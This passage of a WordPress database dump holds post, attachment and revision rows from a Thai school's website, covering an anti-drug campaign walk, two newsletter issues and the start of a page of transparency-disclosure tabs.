(1465,1,'2025-06-26 14:10:26','2025-06-26 07:10:26','','LINE_ALBUM_วันสุนทรภู่_250626_7','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_7-2','','','2025-06-26 14:10:26','2025-06-26 07:10:26','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-1.jpg',0,'attachment','image/jpeg',0),
(1466,1,'2025-06-26 14:10:27','2025-06-26 07:10:27','','LINE_ALBUM_วันสุนทรภู่_250626_9','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_9-2','','','2025-06-26 14:10:27','2025-06-26 07:10:27','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1.jpg',0,'attachment','image/jpeg',0),
(1467,1,'2025-06-26 14:10:27','2025-06-26 07:10:27','','LINE_ALBUM_วันสุนทรภู่_250626_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_8-3','','','2025-06-26 14:10:27','2025-06-26 07:10:27','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-2.jpg',0,'attachment','image/jpeg',0),
(1468,1,'2025-06-26 14:10:27','2025-06-26 07:10:27','','LINE_ALBUM_วันสุนทรภู่_250626_10','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_10-2','','','2025-06-26 14:10:27','2025-06-26 07:10:27','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1.jpg',0,'attachment','image/jpeg',0),
(1469,1,'2025-06-26 14:10:27','2025-06-26 07:10:27','','LINE_ALBUM_วันสุนทรภู่_250626_11','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_11-2','','','2025-06-26 14:10:27','2025-06-26 07:10:27','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1.jpg',0,'attachment','image/jpeg',0),
(1470,1,'2025-06-26 14:10:28','2025-06-26 07:10:28','','LINE_ALBUM_วันสุนทรภู่_250626_12','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_12-3','','','2025-06-26 14:10:28','2025-06-26 07:10:28','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-2.jpg',0,'attachment','image/jpeg',0),
(1471,1,'2025-06-26 14:10:30','2025-06-26 07:10:30','','LINE_ALBUM_วันสุนทรภู่_250626_13','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_13-2','','','2025-06-26 14:10:30','2025-06-26 07:10:30','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1.jpg',0,'attachment','image/jpeg',0),
(1472,1,'2025-06-26 14:10:30','2025-06-26 07:10:30','','LINE_ALBUM_วันสุนทรภู่_250626_14','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_14-2','','','2025-06-26 14:10:30','2025-06-26 07:10:30','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1.jpg',0,'attachment','image/jpeg',0),
(1473,1,'2025-06-26 14:10:30','2025-06-26 07:10:30','','LINE_ALBUM_วันสุนทรภู่_250626_15','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_15-2','','','2025-06-26 14:10:30','2025-06-26 07:10:30','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1.jpg',0,'attachment','image/jpeg',0),
(1474,1,'2025-06-26 14:10:31','2025-06-26 07:10:31','','LINE_ALBUM_วันสุนทรภู่_250626_16','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_16-2','','','2025-06-26 14:10:31','2025-06-26 07:10:31','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1.jpg',0,'attachment','image/jpeg',0),
(1475,1,'2025-06-26 14:10:31','2025-06-26 07:10:31','','LINE_ALBUM_วันสุนทรภู่_250626_17','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_17-2','','','2025-06-26 14:10:31','2025-06-26 07:10:31','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1.jpg',0,'attachment','image/jpeg',0),
(1476,1,'2025-06-26 14:11:09','2025-06-26 07:11:09','<!-- wp:paragraph -->\n<p>วันที่ 26 เดือนมิถุนายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และชุมชนบ้านหนองปลาเข็ง และบ้านกอไหล่ นำโดย นางเสน่หา พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำขบวนเดินรณรงค์ต่อต้านยาเสพติดในชุมชน โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1460,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1460\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1462,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1462\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1459,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1459\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1461,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1461\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1463,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1463\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1464,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1464\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1465,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1465\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1467,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-2-1024x576.jpg\" alt=\"\" class=\"wp-image-1467\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1466,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1466\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1468,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1468\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1469,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1469\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-2-1024x576.jpg\" alt=\"\" class=\"wp-image-1470\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1471,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1471\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1472,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1472\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1473,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1473\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1474,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1474\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1475,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1475\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เดินรณรงค์ วันต่อต้านยาเสพติดโลก','','inherit','closed','closed','','1457-revision-v1','','','2025-06-26 14:11:09','2025-06-26 07:11:09','',1457,'http://pakhaeng.ssk.in.th/?p=1476',0,'revision','',0),
(1477,1,'2025-06-26 14:14:38','2025-06-26 07:14:38','<!-- wp:image {\"id\":1478,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/9-68-724x1024.png\" alt=\"\" class=\"wp-image-1478\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ 9/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-9-2568','','','2025-06-26 14:16:36','2025-06-26 07:16:36','',0,'http://pakhaeng.ssk.in.th/?p=1477',0,'post','',0),
(1478,1,'2025-06-26 14:14:30','2025-06-26 07:14:30','','9-68','','inherit','','closed','','9-68','','','2025-06-26 14:14:30','2025-06-26 07:14:30','',1477,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/9-68.png',0,'attachment','image/png',0),
(1479,1,'2025-06-26 14:14:38','2025-06-26 07:14:38','<!-- wp:image {\"id\":1478,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/9-68-724x1024.png\" alt=\"\" class=\"wp-image-1478\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ 9/2568','','inherit','closed','closed','','1477-revision-v1','','','2025-06-26 14:14:38','2025-06-26 07:14:38','',1477,'http://pakhaeng.ssk.in.th/?p=1479',0,'revision','',0),
(1480,1,'2025-06-26 14:15:56','2025-06-26 07:15:56','<!-- wp:image {\"id\":1481,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/10-68-724x1024.png\" alt=\"\" class=\"wp-image-1481\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ 10/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-10-2568','','','2025-06-26 14:17:30','2025-06-26 07:17:30','',0,'http://pakhaeng.ssk.in.th/?p=1480',0,'post','',0),
(1481,1,'2025-06-26 14:15:24','2025-06-26 07:15:24','','10-68','','inherit','','closed','','10-68','','','2025-06-26 14:15:24','2025-06-26 07:15:24','',1480,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/10-68.png',0,'attachment','image/png',0),
(1482,1,'2025-06-26 14:15:56','2025-06-26 07:15:56','<!-- wp:image {\"id\":1481,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/10-68-724x1024.png\" alt=\"\" class=\"wp-image-1481\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ 10/2568','','inherit','closed','closed','','1480-revision-v1','','','2025-06-26 14:15:56','2025-06-26 07:15:56','',1480,'http://pakhaeng.ssk.in.th/?p=1482',0,'revision','',0),
(1484,1,'2025-06-27 11:36:20','2025-06-27 04:36:20','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":6,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-6 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 